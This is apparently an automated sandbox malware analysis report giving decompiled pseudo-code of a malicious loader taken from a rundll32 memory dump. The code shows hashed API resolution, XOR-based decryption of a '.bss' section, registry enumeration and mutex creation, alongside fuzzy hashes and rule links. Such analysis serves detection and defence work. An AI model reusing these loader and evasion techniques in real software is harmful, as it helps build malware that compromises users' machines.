call 201a29a6644 75->79 82 201a29a3a5d-201a29a3a6e call 201a29a908c 78->82 83 201a29a3a54-201a29a3a5b 78->83 79->65 79->78 95 201a29a3a7a-201a29a3a7c 82->95 96 201a29a3a70-201a29a3a78 RegCloseKey 82->96 83->82 84->49 86 201a29a3b54-201a29a3b57 call 201a29aa7a0 84->86 85->84 93 201a29a3b37-201a29a3b47 call 201a29a405c 85->93 94 201a29a3b5c-201a29a3b5f 86->94 93->84 98 201a29a3b6b-201a29a3b99 94->98 99 201a29a3b61-201a29a3b66 94->99 95->45 95->64 96->95 101 201a29a3b9b-201a29a3ba3 98->101 102 201a29a3baf 98->102 99->49 103 201a29a3bb2-201a29a3bb5 101->103 104 201a29a3ba5-201a29a3bad call 201a29a4d70 101->104 102->103 106 201a29a3bc1-201a29a3bd6 call 201a29aa8e8 103->106 107 201a29a3bb7-201a29a3bbc 103->107 104->103 106->107 111 201a29a3bd8-201a29a3bf4 call 201a29a908c 106->111 107->49 114 201a29a3bfc 111->114 115 201a29a3bf6-201a29a3bfa 111->115 116 201a29a3bff-201a29a3c07 114->116 115->116 118 201a29a3c9d-201a29a3ca5 call 201a29a9d6c 116->118 119 201a29a3c0d-201a29a3c1e call 201a29a908c 116->119 118->63 123 201a29a3c20-201a29a3c24 119->123 124 201a29a3c26 119->124 125 201a29a3c29-201a29a3c3a call 201a29a908c 123->125 124->125 129 201a29a3c4b 125->129 130 201a29a3c3c-201a29a3c49 125->130 131 201a29a3c4e-201a29a3c55 129->131 130->131 133 201a29a3c6f-201a29a3c7c call 201a29a908c 131->133 134 201a29a3c57-201a29a3c64 call 201a29a908c 131->134 139 201a29a3c8f 133->139 140 201a29a3c7e-201a29a3c8d 133->140 134->50 141 201a29a3c6a-201a29a3c6d 134->141 142 201a29a3c92-201a29a3c95 139->142 140->142 141->54 142->6 144 201a29a3c97-201a29a3c9b 142->144 144->134
                                C-Code - Quality: 41%
                                			E00000201201A29A37E0(long long* __rax, long long __rcx, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t80;
				void* _t83;
				void* _t84;
				void* _t100;
				void* _t176;
				long long* _t222;
				long long* _t223;
				long long* _t224;
				long long _t225;
				intOrPtr _t226;
				long long* _t228;
				long long* _t229;
				void* _t230;
				void* _t288;
				long long _t289;
				void* _t291;
				void* _t294;
				intOrPtr _t295;
				intOrPtr _t296;
				void* _t300;
				void* _t301;
				void* _t303;
				void* _t310;
				void* _t313;
				long long _t314;
				void* _t315;
				void* _t316;
				long long _t319;
				long long* _t320;
				void* _t322;
				CHAR* _t327;

				_t222 = __rax;
				 *((long long*)(_t300 + 8)) = __rcx;
				_t301 = _t300 - 0x248;
				_t292 =  *0xa29ad458;
				_t295 =  *((intOrPtr*)( *0xa29ad458 + 8));
				 *((long long*)(_t301 + 0x20)) =  *0xa29ad448;
				 *(_t301 + 0x298) =  *0xa29ad450;
				GetModuleHandleA(_t327);
				_t80 = E00000201201A29A40F8(__rax,  *0xa29ad458 + 0x18, _t303, _t313, _t322, _t319);
				r13d = 0;
				if (_t80 != r13d) goto 0xa29a38bf;
				E00000201201A29A908C(0xa30cd0f3, _t222,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
				if (_t222 == _t319) goto 0xa29a3866;
				 *_t222();
				goto 0xa29a3869;
				_t223 = _t319;
				_t83 = E00000201201A29A40F8(_t223, _t292 + 0x10, _t303, _t313, _t316, _t288); // executed
				if (_t83 != r13d) goto 0xa29a38bf;
				_t84 = E00000201201A29A5FC8(_t223, _t230,  *0xa29ad448 + 0x201a29b1082, _t292 + 0x28, _t292, _t295, _t291, _t294); // executed
				if (_t84 != r13d) goto 0xa29a38bf;
				if (E00000201201A29A5FC8(_t223, _t230,  *0xa29ad448 + 0x201a29b1079, _t292 + 0x20, _t292, _t295) != r13d) goto 0xa29a38bf;
				if (E00000201201A29A5FC8(_t223, _t230,  *0xa29ad448 + 0x201a29b1092, _t292 + 0x30, _t292, _t295) != r13d) goto 0xa29a3cc0;
				HeapAlloc(??, ??, ??);
				_t289 = _t223;
				if (_t223 == _t319) goto 0xa29a3cbb;
				E00000201201A29A487A();
				E00000201201A29A908C(0x9ffc4c27, _t223,  *((intOrPtr*)(_t292 + 0x10)));
				if (_t223 == _t319) goto 0xa29a390d;
				 *_t223();
				_t24 = _t289 + 0xa8; // 0xa8
				_t224 = _t24;
				 *_t224 = _t224;
				 *((long long*)(_t289 + 0xb0)) = _t224;
				 *(_t289 + 0x9c) = r13d;
				 *(_t289 + 0xa0) = r13d;
				 *(_t289 + 0x98) = r13d;
				E00000201201A29A638C(_t224, _t230, _t292, _t230);
				E00000201201A29A908C(0xdc444c2b, _t224,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t224 == _t319) goto 0xa29a395e;
				r9d = 0;
				r8d = 0;
				 *_t224();
				goto 0xa29a3961;
				_t225 = _t319;
				 *((long long*)(_t289 + 0x28)) = _t225;
				if (_t225 != _t319) goto 0xa29a398e;
				E00000201201A29A908C(0xc06f8334, _t225,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t225 == _t319) goto 0xa29a3984;
				 *_t225();
				goto 0xa29a3caa;
				goto 0xa29a3cac;
				r8d = 0x1102;
				HeapAlloc(??, ??, ??);
				_t320 = _t225;
				_t34 = _t295 + 0x7f; // 0x7f
				r12d = _t34;
				if (_t225 == _t295) goto 0xa29a3a8e;
				 *_t225 = 0;
				E00000201201A29A908C(0x3d06c463, _t225,  *((intOrPtr*)( *0xa29ad458 + 0x20)));
				if (_t225 == _t295) goto 0xa29a39fb;
				RegOpenKeyW(??, ??, ??); // executed
				goto 0xa29a39fe;
				if (r12d != 0) goto 0xa29a3a7e;
				E00000201201A29A908C(0xdf514773, _t225,  *((intOrPtr*)( *0xa29ad458 + 0x20)));
				if (_t225 == 0) goto 0xa29a3a30;
				r9d = 0x104;
				RegEnumKeyW(??, ??, ??, ??); // executed
				goto 0xa29a3a33;
				if (r12d != 0) goto 0xa29a3a4c;
				_t100 = E00000201201A29A6644(_t225, _t230, _t320, _t301 + 0x30, _t292, _t301 + 0x30, _t313);
				if (_t100 == 0) goto 0xa29a3a02;
				if (_t100 != 0x103) goto 0xa29a3a5d;
				 *0xa29ad438 = _t320;
				E00000201201A29A908C(0xbba3b4b6, _t225,  *((intOrPtr*)( *0xa29ad458 + 0x20)));
				if (_t225 == 0) goto 0xa29a3a7a;
				RegCloseKey(??); // executed
				if (0 == 0) goto 0xa29a3a93;
				HeapFree(??, ??, ??);
				goto 0xa29a3a93;
				r13d = 0;
				if (8 != r13d) goto 0xa29a3cb1;
				_t296 =  *0xa29ad448;
				_t47 = _t320 + 8; // 0x8
				r8d = _t47;
				0xa29a47b0();
				 *((intOrPtr*)(_t301 + 0x2a6)) = r13w;
				if (E00000201201A29AA0AC(8, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, 0x201a29a0000 + _t296 + 0x11188) == r13d) goto 0xa29a3b05;
				_t310 = 0x201a29a0000 + _t296 + 0x111e0;
				if (E00000201201A29AA0AC(_t104, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, _t310) != r13d) goto 0xa29a3cb1;
				_t57 = _t289 + 8; // 0x8
				_t286 = _t57;
				if (E00000201201A29A5058(_t225, _t230, _t289, _t57, _t292, _t296) != r13d) goto 0xa29a3b4b;
				E00000201201A29A405C(_t230, _t289, _t57, _t289, _t292, _t296);
				 *((long long*)(_t289 + 0x30)) = _t225;
				if (_t225 == _t320) goto 0xa29a3b4b;
				_t59 = _t289 + 8; // 0x8
				E00000201201A29A405C(_t230, _t59, _t57, _t289, _t292, _t296);
				 *((long long*)(_t289 + 0x38)) = _t225;
				_t144 =  !=  ? r13d : 8;
				_t207 = ( !=  ? r13d : 8) - r13d;
				if (( !=  ? r13d : 8) != r13d) goto 0xa29a3cb1;
				if (E00000201201A29AA7A0(_t176, _t225, _t230, _t289, _t286, __r9) != r13d) goto 0xa29a3b6b;
				goto 0xa29a3cb1;
				_t226 =  *((intOrPtr*)(_t301 + 0x20));
				r9d =  *(_t301 + 0x298);
				_t314 = _t226 + 0x201a29af000;
				r8d =  *(_t314 + 2) & 0x0000ffff;
				if (_t226 - _t310 + 8 <= 0) goto 0xa29a3baf;
				if ((r9d ^ 0xe49a1e6d) == r13d) goto 0xa29a3bb2;
				E00000201201A29A4D70(r9d ^ 0xe49a1e6d, _t310 + _t314 + 8);
				goto 0xa29a3bb2;
				_t228 = _t320;
				if (_t228 != _t320) goto 0xa29a3bc1;
				goto 0xa29a3cb1;
				r9d = r9d ^ 0xecb028fc;
				E00000201201A29AA8E8(r9d, _t228, _t314, __r9);
				if (_t228 == _t320) goto 0xa29a3bb7;
				 *((long long*)(_t289 + 0x40)) = _t314;
				 *0xa29ad440 = _t289;
				E00000201201A29A908C(0xa30cd0f3, _t228,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t228 == _t320) goto 0xa29a3bfc;
				 *_t228();
				goto 0xa29a3bff;
				_t229 = _t320;
				if (_t229 ==  *((intOrPtr*)(_t301 + 0x290))) goto 0xa29a3c9d;
				E00000201201A29A908C(0x9f72cbe0, _t229,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t229 == _t320) goto 0xa29a3c26;
				 *_t229();
				goto 0xa29a3c29;
				E00000201201A29A908C(0xaade337c, _t229,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t229 == _t320) goto 0xa29a3c4b;
				r8d = r13d;
				 *_t229();
				goto 0xa29a3c4e;
				if (_t320 != _t320) goto 0xa29a3c6f;
				E00000201201A29A908C(0xc06f8334, _t229,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t229 != _t320) goto 0xa29a397d;
				goto 0xa29a3cac;
				E00000201201A29A908C(0x1c8cff93, _t229,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t229 == _t320) goto 0xa29a3c8f;
				 *_t229();
				goto 0xa29a3c92;
				if (r13d != r13d) goto 0xa29a3cc0;
				goto 0xa29a3c57;
				asm("lock add dword [esi+0x38], 0x1");
				if (E00000201201A29A9D6C(r12d, 0x1c8cff93, _t230, _t289, _t320, _t289, __r9, _t314, _t315) == r13d) goto 0xa29a3cc0;
				E00000201201A29A6CE4(_t229, _t230, _t289, _t320, _t292);
				goto 0xa29a3cc0;
				return 8;
			}






































                                0x201a29a37e0
                                0x201a29a37e0
                                0x201a29a37f1
                                0x201a29a37ff
                                0x201a29a380c
                                0x201a29a3817
                                0x201a29a3824
                                0x201a29a382b
                                0x201a29a3838
                                0x201a29a383d
                                0x201a29a3845
                                0x201a29a3850
                                0x201a29a3858
                                0x201a29a3862
                                0x201a29a3864
                                0x201a29a3866
                                0x201a29a3870
                                0x201a29a387a
                                0x201a29a3888
                                0x201a29a3892
                                0x201a29a38aa
                                0x201a29a38c2
                                0x201a29a38d5
                                0x201a29a38db
                                0x201a29a38e1
                                0x201a29a38ef
                                0x201a29a38fd
                                0x201a29a3905
                                0x201a29a390b
                                0x201a29a390d
                                0x201a29a390d
                                0x201a29a3917
                                0x201a29a391a
                                0x201a29a3921
                                0x201a29a3928
                                0x201a29a392f
                                0x201a29a3936
                                0x201a29a3944
                                0x201a29a394c
                                0x201a29a394e
                                0x201a29a3951
                                0x201a29a395a
                                0x201a29a395c
                                0x201a29a395e
                                0x201a29a3961
                                0x201a29a3968
                                0x201a29a3973
                                0x201a29a397b
                                0x201a29a397d
                                0x201a29a397f
                                0x201a29a3989
                                0x201a29a3997
                                0x201a29a39a4
                                0x201a29a39ac
                                0x201a29a39af
                                0x201a29a39af
                                0x201a29a39b6
                                0x201a29a39bc
                                0x201a29a39c8
                                0x201a29a39d0
                                0x201a29a39f5
                                0x201a29a39f9
                                0x201a29a3a00
                                0x201a29a3a0b
                                0x201a29a3a13
                                0x201a29a3a22
                                0x201a29a3a2a
                                0x201a29a3a2e
                                0x201a29a3a35
                                0x201a29a3a41
                                0x201a29a3a4a
                                0x201a29a3a52
                                0x201a29a3a54
                                0x201a29a3a66
                                0x201a29a3a6e
                                0x201a29a3a78
                                0x201a29a3a7c
                                0x201a29a3a86
                                0x201a29a3a8c
                                0x201a29a3a93
                                0x201a29a3a99
                                0x201a29a3a9f
                                0x201a29a3aa6
                                0x201a29a3aa6
                                0x201a29a3ab7
                                0x201a29a3ad6
                                0x201a29a3ae9
                                0x201a29a3aeb
                                0x201a29a3b08
                                0x201a29a3b0e
                                0x201a29a3b0e
                                0x201a29a3b1f
                                0x201a29a3b29
                                0x201a29a3b2e
                                0x201a29a3b35
                                0x201a29a3b37
                                0x201a29a3b3b
                                0x201a29a3b43
                                0x201a29a3b47
                                0x201a29a3b4b
                                0x201a29a3b4e
                                0x201a29a3b5f
                                0x201a29a3b66
                                0x201a29a3b6b
                                0x201a29a3b70
                                0x201a29a3b78
                                0x201a29a3b83
                                0x201a29a3b99
                                0x201a29a3ba3
                                0x201a29a3ba8
                                0x201a29a3bad
                                0x201a29a3baf
                                0x201a29a3bb5
                                0x201a29a3bbc
                                0x201a29a3bc1
                                0x201a29a3bce
                                0x201a29a3bd6
                                0x201a29a3bd8
                                0x201a29a3be5
                                0x201a29a3bec
                                0x201a29a3bf4
                                0x201a29a3bf8
                                0x201a29a3bfa
                                0x201a29a3bfc
                                0x201a29a3c07
                                0x201a29a3c16
                                0x201a29a3c1e
                                0x201a29a3c20
                                0x201a29a3c24
                                0x201a29a3c32
                                0x201a29a3c3a
                                0x201a29a3c3e
                                0x201a29a3c44
                                0x201a29a3c49
                                0x201a29a3c55
                                0x201a29a3c5c
                                0x201a29a3c64
                                0x201a29a3c6d
                                0x201a29a3c74
                                0x201a29a3c7c
                                0x201a29a3c8b
                                0x201a29a3c8d
                                0x201a29a3c95
                                0x201a29a3c9b
                                0x201a29a3c9d
                                0x201a29a3caf
                                0x201a29a3cb4
                                0x201a29a3cb9
                                0x201a29a3cd5

                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Alloc$CloseEnumErrorFreeHandleLastModuleOpen
                                • String ID:
                                • API String ID: 2248784776-0
                                • Opcode ID: 92d77bb05cadc40fcac066ca41b522769a1026bec4031250602ee8567609c9a5
                                • Instruction ID: cb1fd0e742a42fbabd141426d10e2e4dd9e2c10633d0c03ec6019987861242a1
                                • Opcode Fuzzy Hash: 92d77bb05cadc40fcac066ca41b522769a1026bec4031250602ee8567609c9a5
                                • Instruction Fuzzy Hash: 92D19F2530277096EE68AB69E48D3AB6365F788F8CF704411DE4E47793DE78D4AAC304
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201A29AA0AC Relevance: 3.1, APIs: 2, Instructions: 105filenativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: File$CreateDirectoryErrorLastQuery
                                • String ID:
                                • API String ID: 2967190759-0
                                • Opcode ID: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                                • Instruction ID: 1e4000a7bd2e1a0f68ad0785df46c5dc3c71ca2925bf0b12b2061f7740d2c54d
                                • Opcode Fuzzy Hash: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                                • Instruction Fuzzy Hash: 9141A13230676097FF588B5AA58839A72A0F7CCBD4F284525DE5D43B86CF38D466C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201A29A4DB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 48%
                                			E00000201201A29A4DB4(long long __rbx, long long __rcx, long long __rdi, long long __rsi, void* __r9, void* __r11) {
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t30;
				long long _t55;
				void* _t71;
				intOrPtr* _t74;
				intOrPtr* _t75;
				long long _t81;
				long long _t82;
				long long _t84;
				void* _t90;
				long _t92;
				long _t94;
				long _t96;

				_t90 = __r9;
				_t55 = _t84;
				 *((long long*)(_t55 + 8)) = __rbx;
				 *((long long*)(_t55 + 0x10)) = _t81;
				 *((long long*)(_t55 + 0x18)) = __rsi;
				 *((long long*)(_t55 + 0x20)) = __rdi;
				_t82 = __rcx;
				r8d = 0;
				HeapCreate(_t96, _t94, _t92); // executed
				if (_t55 == 0) goto 0xa29a4f03;
				_t71 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
				_t74 = _t55 + _t71 + 0x68;
				_t22 =  *_t74;
				if (_t22 == 0) goto 0xa29a4e94;
				if (_t22 == 0x7373622e) goto 0xa29a4e22;
				_t75 = _t74 + 0x28;
				_t23 =  *_t75;
				if (_t23 != 0) goto 0xa29a4e11;
				if (_t23 == 0) goto 0xa29a4e94;
				r13d =  *(_t75 + 0x10);
				r12d =  *(_t75 + 0x14);
				r12d = r12d ^  *(_t71 + 8);
				r12d = r12d ^ r13d;
				HeapAlloc(??, ??, ??);
				if (_t55 == 0) goto 0xa29a4e8d;
				r9d = r12d;
				r8d = r13d;
				E00000201201A29A111C(_t55, _t55, __rbx, _t55, _t71 + __rcx);
				r11d =  *((intOrPtr*)(_t75 + 0xc));
				 *0xa29ad448 = _t55 - __r11 - _t82;
				 *0xa29ad450 = E00000201201A29A16FC(_t55, _t55 - __r11 - _t82 + 0xa29b1040);
				goto 0xa29a4e99;
				goto 0xa29a4e99;
				if (2 == 0) goto 0xa29a4ea8;
				HeapDestroy(??);
				goto 0xa29a4f03;
				HeapAlloc(??, ??, ??);
				if (0xa29b1040 != 0) goto 0xa29a4ee1;
				HeapDestroy(??);
				goto 0xa29a4f03;
				E00000201201A29A487A();
				 *0x201A29B1048 = _t55;
				 *0xa29ad458 = 0xa29b1040; // executed
				_t30 = E00000201201A29A37E0(0xa29b1040, _t82, _t90); // executed
				return _t30;
			}

















                                0x201a29a4db4
                                0x201a29a4db4
                                0x201a29a4db7
                                0x201a29a4dbb
                                0x201a29a4dbf
                                0x201a29a4dc3
                                0x201a29a4dd1
                                0x201a29a4dd4
                                0x201a29a4de3
                                0x201a29a4def
                                0x201a29a4dfb
                                0x201a29a4e02
                                0x201a29a4e07
                                0x201a29a4e0b
                                0x201a29a4e16
                                0x201a29a4e18
                                0x201a29a4e1c
                                0x201a29a4e20
                                0x201a29a4e24
                                0x201a29a4e26
                                0x201a29a4e2a
                                0x201a29a4e31
                                0x201a29a4e3a
                                0x201a29a4e3d
                                0x201a29a4e49
                                0x201a29a4e4e
                                0x201a29a4e51
                                0x201a29a4e5a
                                0x201a29a4e5f
                                0x201a29a4e75
                                0x201a29a4e85
                                0x201a29a4e8b
                                0x201a29a4e92
                                0x201a29a4e9b
                                0x201a29a4ea0
                                0x201a29a4ea6
                                0x201a29a4ec3
                                0x201a29a4ecf
                                0x201a29a4ed4
                                0x201a29a4edf
                                0x201a29a4ee9
                                0x201a29a4eee
                                0x201a29a4ef5
                                0x201a29a4efc
                                0x201a29a4f23

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$AllocDestroy$Create
                                • String ID: .bss
                                • API String ID: 388876957-3890483948
                                • Opcode ID: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                                • Instruction ID: db4166cf2e94e52954ad366ba799a3e103ac906b36ac0189fdfba42a99be8011
                                • Opcode Fuzzy Hash: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                                • Instruction Fuzzy Hash: C0416D2570276086EF1CCB5AA84831B77A0F789F98F349025DE4947B96DF38D8A6C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201A29AA7A0 Relevance: 6.1, APIs: 4, Instructions: 88memorysynchronizationCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 29%
                                			E00000201201A29AA7A0(void* __edi, long long* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, void* __r9, long long _a8, char _a16, char _a24) {
				intOrPtr _v56;
				void* _v64;
				intOrPtr _v72;
				long long _v88;
				void* __rsi;
				void* __rbp;
				long long* _t58;
				long long* _t59;
				long long _t60;
				long long _t75;
				intOrPtr* _t87;

				_t60 = __rbx;
				_t58 = __rax;
				_a8 = __rbx;
				_t76 =  *0xa29ad458;
				_t87 = __rcx;
				_v72 = 0x18;
				_v56 = 0;
				E00000201201A29A908C(0xe9f8f8df, __rax,  *((intOrPtr*)( *0xa29ad458 + 0x20)));
				if (_t58 == __rbx) goto 0xa29aa804;
				r9d = 0; // executed
				 *_t58(); // executed
				goto 0xa29aa806;
				if (0 == 0) goto 0xa29aa8d2;
				r9d = 0;
				_a16 =  *__rcx;
				_t59 =  &_a24;
				_v88 = _t59;
				E00000201201A29A1000(__edi, _t59, __rbx,  &_a16,  *0xa29ad458, 0x201a29a0000,  *0xa29ad448 + 0x201a29b1178);
				if (_t59 == _t60) goto 0xa29aa8d2;
				E00000201201A29A908C(0x3ff22481, _t59,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
				if (_t59 == _t60) goto 0xa29aa875;
				CreateMutexW(??, ??, ??); // executed
				goto 0xa29aa878;
				_t75 = _t60;
				if (_t75 == _t60) goto 0xa29aa8c4;
				E00000201201A29A908C(0xc06f8334, _t59,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
				if (_t59 == _t60) goto 0xa29aa894;
				 *_t59();
				goto 0xa29aa899;
				if (0x7f != 0xb7) goto 0xa29aa8ba;
				E00000201201A29A908C(0xa219a077, _t59,  *((intOrPtr*)(_t76 + 0x18)));
				if (_t59 == _t60) goto 0xa29aa8c4;
				FindCloseChangeNotification(??); // executed
				goto 0xa29aa8c4;
				 *((long long*)(_t87 + 0x18)) = _t75;
				HeapFree(??, ??, ??);
				return 1;
			}














                                0x201a29aa7a0
                                0x201a29aa7a0
                                0x201a29aa7a0
                                0x201a29aa7b0
                                0x201a29aa7be
                                0x201a29aa7c5
                                0x201a29aa7cf
                                0x201a29aa7dc
                                0x201a29aa7eb
                                0x201a29aa7fd
                                0x201a29aa800
                                0x201a29aa802
                                0x201a29aa808
                                0x201a29aa812
                                0x201a29aa81d
                                0x201a29aa824
                                0x201a29aa838
                                0x201a29aa83d
                                0x201a29aa848
                                0x201a29aa857
                                0x201a29aa85f
                                0x201a29aa86e
                                0x201a29aa873
                                0x201a29aa875
                                0x201a29aa87b
                                0x201a29aa886
                                0x201a29aa88e
                                0x201a29aa890
                                0x201a29aa892
                                0x201a29aa89e
                                0x201a29aa8a9
                                0x201a29aa8b1
                                0x201a29aa8b6
                                0x201a29aa8b8
                                0x201a29aa8ba
                                0x201a29aa8cc
                                0x201a29aa8e7

                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: DescriptorSecurity$ChangeCloseConvertCreateErrorFindFreeHeapLastMutexNotificationString
                                • String ID:
                                • API String ID: 2727274001-0
                                • Opcode ID: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                                • Instruction ID: d3e9368ba4873339c505feadad2c77f2c08289a9bf92e84dc5601bbdde09a22c
                                • Opcode Fuzzy Hash: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                                • Instruction Fuzzy Hash: 253182327027A497EE68DF59E4483DB73A0F788B88F644421DA4D43786DE38D567C790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201A29A40F8 Relevance: 2.6, APIs: 2, Instructions: 131memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: AllocHeap
                                • String ID:
                                • API String ID: 4292702814-0
                                • Opcode ID: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                                • Instruction ID: ec3aa1cd2b5154ab69fa9795f20524594849ff5dee19dbbb36490c536df1d910
                                • Opcode Fuzzy Hash: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                                • Instruction Fuzzy Hash: 2C516172705BA086DB68CF09F448B5F77A4F784B98F255115EE8943B95DB38C8A2CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201A29A5FC8 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 29%
                                			E00000201201A29A5FC8(long long* __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, void* _a24, long long _a32) {
				long long* _t32;
				long long* _t35;
				long long _t41;
				void* _t56;
				void* _t57;

				_t32 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a32 = __rsi;
				_t48 =  *0xa29ad458;
				E00000201201A29A908C(0x2d4b080e, __rax,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
				if (_t32 == 0) goto 0xa29a6006;
				LoadLibraryA(??); // executed
				_t35 = _t32;
				goto 0xa29a6008;
				if (_t35 == 0) goto 0xa29a6048;
				if (E00000201201A29A40F8(_t35,  &_a24, _t56, _t57) != 0) goto 0xa29a602e;
				_t41 = _a24;
				 *_t41 = _t35;
				 *__rdx = _t41;
				goto 0xa29a6066;
				E00000201201A29A908C(0xc8e2960c, _t32,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
				if (_t32 == 0) goto 0xa29a6066;
				 *_t32();
				goto 0xa29a6066;
				E00000201201A29A908C(0xc06f8334, _t32,  *((intOrPtr*)(_t48 + 0x18)));
				if (_t32 == 0) goto 0xa29a6061;
				 *_t32();
				goto 0xa29a6066;
				return 0x7f;
			}








                                0x201a29a5fc8
                                0x201a29a5fc8
                                0x201a29a5fcd
                                0x201a29a5fd2
                                0x201a29a5fdc
                                0x201a29a5ff2
                                0x201a29a5ffa
                                0x201a29a5fff
                                0x201a29a6001
                                0x201a29a6004
                                0x201a29a600b
                                0x201a29a601e
                                0x201a29a6020
                                0x201a29a6025
                                0x201a29a6028
                                0x201a29a602c
                                0x201a29a6037
                                0x201a29a603f
                                0x201a29a6044
                                0x201a29a6046
                                0x201a29a6051
                                0x201a29a6059
                                0x201a29a605b
                                0x201a29a605f
                                0x201a29a607c

                                APIs
                                  • Part of subcall function 00000201A29A908C: SetLastError.KERNEL32 ref: 00000201A29A90C8
                                • LoadLibraryA.KERNELBASE(?,?,00000000,00000201A29A8947,?,?,?,?,?,00000201A29A9D9C), ref: 00000201A29A5FFF
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: ErrorLastLibraryLoad
                                • String ID:
                                • API String ID: 3568775529-0
                                • Opcode ID: 99d26a6194f647cbc272d2d1eeaeaa4141e7c0158a623e847e66b8beeb9b8dfc
                                • Instruction ID: 033ccdc57664e71c366358e11bf6f1f8fa51d5e6c3cbb106bcf38b49f4c83d52
                                • Opcode Fuzzy Hash: 99d26a6194f647cbc272d2d1eeaeaa4141e7c0158a623e847e66b8beeb9b8dfc
                                • Instruction Fuzzy Hash: 7111602631777086FE689B5AA54626B6260A7CCFC4F3C4431DE4E47747DE38D9A2C320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201A29A6958 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 73%
                                			_entry_(void* __ecx, void* __edx, long long __rcx, void* __r8) {
				void* __rbx;
				void* _t2;
				long long* _t15;
				long long _t16;
				void* _t20;
				long long _t21;
				long long _t22;
				void* _t24;
				void* _t25;

				_t17 = __rcx;
				if (__edx == 0) goto 0xa29a697b;
				if (__edx != 1) goto 0xa29a6998;
				_t20 = __r8; // executed
				_t2 = E00000201201A29A4DB4(_t16, __rcx, _t21, _t22, _t24, _t25); // executed
				if (_t2 == 0) goto 0xa29a6998;
				goto 0xa29a6998;
				E00000201201A29A6CE4(_t15, _t16, _t17, _t20, _t22);
				if ( *0xa29ad458 == 0) goto 0xa29a6998;
				HeapDestroy(??); // executed
				return 0;
			}












                                0x201a29a6958
                                0x201a29a6965
                                0x201a29a6969
                                0x201a29a696b
                                0x201a29a696e
                                0x201a29a6975
                                0x201a29a6979
                                0x201a29a697d
                                0x201a29a698c
                                0x201a29a6992
                                0x201a29a699f

                                APIs
                                Memory Dump Source
